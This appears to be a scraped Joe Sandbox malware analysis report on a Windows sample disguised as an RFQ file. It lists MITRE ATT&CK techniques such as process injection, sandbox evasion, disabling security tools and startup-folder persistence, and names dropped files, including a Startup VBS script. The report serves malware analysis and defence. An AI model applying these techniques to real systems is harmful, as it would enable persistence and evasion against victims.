Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1020000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7714f6cf4c11540e22cc6f6a1be7df19bc241c8e218e87702d5d8f88166d05fd
Instruction ID: 1f2de9b30ac89c1db6f5f6732f7918fd50d786f682edb0e8ddc9dc1b05aa43cf
Opcode Fuzzy Hash: 7714f6cf4c11540e22cc6f6a1be7df19bc241c8e218e87702d5d8f88166d05fd
Instruction Fuzzy Hash: D290023308560C9B454027A57809596775DB5445267850052A54D415115AA5746159D5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ-12202431_ACD_Group.pif.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Roaming\Count.exe

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
RFQ-12202431_ACD_Group.pif.exe

Function 06B57471 Relevance: 2.6, Strings: 1, Instructions: 1336
COMMON

Function 06E40040 Relevance: 1.9, Strings: 1, Instructions: 616
COMMON

Function 06E43890 Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Function 06E43898 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Function 06C411C0 Relevance: 2.6, Strings: 2, Instructions: 66
COMMON

Function 06C414A5 Relevance: 2.5, Strings: 2, Instructions: 28
COMMON

Function 06E442FF Relevance: 1.7, APIs: 1, Instructions: 205
processCOMMON

Function 06E44308 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Function 05F187C5 Relevance: 1.6, APIs: 1, Instructions: 147
fileCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre